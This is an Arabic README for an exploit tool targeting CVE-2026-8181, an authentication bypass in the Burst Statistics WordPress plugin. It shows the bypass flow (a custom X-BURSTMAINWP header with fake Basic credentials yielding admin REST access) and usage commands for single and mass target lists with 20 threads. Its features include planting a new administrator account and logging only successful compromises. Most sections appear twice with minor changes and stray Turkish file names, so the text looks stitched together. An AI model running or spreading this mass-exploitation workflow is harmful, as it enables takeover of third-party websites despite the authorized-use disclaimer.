
CVE-2026-8181 PoC: تجاوز المصادقة في Burst Statistics (الإصدارات 3.4.0–3.4.1.1). أداة بلغة بايثون — فحص هدف واحد وأهداف متعددة، عمالة متعددة الخيوط، تقارير بصيغة TXT. للاختبار المصرح به فقط. الصيانة: mürrez.
AR: PoC خاضع للرقابة وملاحظات تقنية موجزة لـ اختبار أمني مصرح به لتجاوز المصادقة في Burst Statistics.
AR(2): PoC خاضع للرقابة وملاحظات تقنية موجزة لـ اختبار أمني مصرح به لتجاوز المصادقة في Burst Statistics.
ملاحظة: رقم 200,000+ تثبيت نشط على WordPress.org يمثل قاعدة المستخدمين الكاملة للإضافة — ولا يعني أن كل موقع يعمل بنسخة ضعيفة. يتطلب التأثير الحقيقي التحقق من الإصدار + البيئة (HTTP / توفر كلمة مرور التطبيق، إلخ).
ملاحظة: رقم 200,000+ تثبيت نشط على WordPress.org هو قاعدة المستخدمين الكاملة للإضافة؛ ولا يعني أن جميع المواقع تعمل بنسخة ضعيفة. للحصول على التأثير الحقيقي، يجب التحقق من الإصدار + البيئة (HTTP، توفر كلمة مرور التطبيق، إلخ).
لا يدعم Markdown بنكهة GitHub تضمين GIFs ثنائية بدون ملف في المستودع. نصوص Typing SVG أعلاه (CDN) تحاكي الحركة. لإضافة لقطة شاشة خاصة بك:

لا يدعم GitHub Markdown تضمين GIF بدون وجود ملف في المستودع. نصوص Typing SVG (CDN) تقدم حركة نصية. لإضافة عرضك التوضيحي:

flowchart LR
A[طلب العميل] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|فرع معالج بشكل خاطئ| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: سياق مشرف كامل]
flowchart LR
A[طلب] --> B[X-BURSTMAINWP: 1]
A --> C[Authorization: Basic]
B --> D[plugins_loaded]
D --> E[is_mainwp_authenticated]
E --> F{wp_authenticate_application_password == null?}
F -->|فرع خاطئ| G[get_user_by login]
G --> H[wp_set_current_user]
H --> I[REST: سياق مشرف كامل]
مع -f، -o و --output-dir متنافيان.
في وضع -f لا يمكن استخدام -o مع --output-dir معًا.
pip3 install requests urllib3
# موقع واحد، ملف تقرير
python3 CVE-2026-8181.py -u http://lab.local -U admin -o report.txt -k
# موقع واحد + مشرف جديد (معمل)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o report.txt -k
# جماعي + ملف مدمج (النجاحات فقط)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o successes.txt -k
# جماعي + ملفات لكل مضيف في مجلد (النجاحات فقط)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
# موقع واحد، تقرير
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k
# موقع واحد + مشرف جديد (معمل)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k
# جماعي + ملف مدمج (النجاحات فقط)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k
# جماعي + ملف لكل موقع في مجلد (النجاحات فقط)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k
Password: الفارغ / سطر كلمة المرور الفارغلا يقوم التجاوز الناجح بتسريب كلمة المرور الحقيقية للمستخدم الضحية — كلمة مرور Basic في PoC مزيفة. يبقى سطر Password: فارغًا ما لم يقم --create-user بإنشاء حساب جديد (ثم تُكتب كلمة المرور المُنشأة).
لا يقوم التجاوز الناجح بتسريب كلمة المرور الحقيقية للمستخدم الحالي — كلمة مرور Basic في PoC مزيفة. يبقى سطر Password: فارغًا ما لم يقم --create-user بإنشاء حساب جديد؛ وفي هذه الحالة تُكتب كلمة المرور المُنشأة.
للاستخدام في التقييمات المصرح بها كتابيًا و مختبراتك الخاصة فقط. الاستخدام غير المصرح به غير قانوني في العديد من الدول. لا يتحمل المؤلفون ومُعد هذا README أي مسؤولية عن سوء الاستخدام.
للاستخدام في التقييمات المصرح بها كتابيًا و مختبرك الخاص فقط. الاستخدام غير المصرح به غير قانوني في العديد من الدول. لا يتحمل المؤلفون ومحرر هذا README أي مسؤولية عن سوء الاستخدام.
| الحقل | التفصيل |
|---|
| ما | تجاوز المصادقة (CWE-287) في Burst Statistics: يمكن للعناوين المخصصة تصعيد طلبات REST إلى سياق مشرف كامل. |
| الإصدارات | الضعيفة: 3.4.0, 3.4.1, 3.4.1.1 · الموصى به: 3.4.2 أو أحدث |
| الخطورة | CVSS ~9.8 (حرجة)؛ عن بُعد، بدون مصادقة في الظروف المناسبة. |
| هذا المستودع | CVE-2026-8181.py — أتمتة معمل: هدف واحد، قائمة جماعية، مجموعة خيوط، إخراج TXT انتقائي. |
| الحقل | التفصيل |
|---|
| ما | تجاوز المصادقة (CWE-287) لـ Burst Statistics. رؤوس مخصصة تؤدي إلى سياق مشرف كامل في طلب REST. |
| الإصدارات | المتأثرة: 3.4.0, 3.4.1, 3.4.1.1 · الموصى به: 3.4.2 وما فوق |
| الخطورة | CVSS ~9.8 (حرجة)؛ عن بُعد وبدون مصادقة في الظروف المناسبة. |
| هذا المستودع | CVE-2026-8181.py — أتمتة معمل: هدف واحد، مسح قائمة، مجموعة خيوط، إخراج TXT انتقائي. |
| الميزة | الوصف |
|---|
| هدف واحد | -u عنوان URL أساسي |
| أهداف جماعية | -f targets.txt (عنوان URL واحد في كل سطر؛ تعليقات #) |
| التزامن | -j N عامل (محدود السقف) |
| ملف مدمج | -o file.txt — مع -f، يتم إلحاق الاستغلالات الناجحة فقط |
| ملفات لكل مضيف | --output-dir — النجاحات فقط تحصل على host.txt (يتم تخطي الفاشلات) |
| مشرف جديد | --create-user — مستخدم عشوائي عبر REST (تظهر كلمة المرور في التقرير) |
| TLS (معمل) | -k يعطل التحقق من الشهادة (معامل موثوقة فقط) |
| الميزة | الوصف |
|---|
| هدف واحد | -u عنوان جذر |
| أهداف متعددة | -f targets.txt (عنوان URL لكل سطر؛ تعليق #) |
| توازٍ | -j N عامل (حد أقصى) |
| ملف واحد | -o dosya.txt — مع -f يتم إلحاق الاستغلال الناجح فقط |
| إخراج مجلد | --output-dir — الناجحون فقط يحصلون على host.txt |
| مشرف جديد | --create-user — مستخدم عشوائي عبر REST (كلمة المرور في التقرير) |
| TLS (معمل) | -k يعطل التحقق من الشهادة (معامل موثوقة فقط) |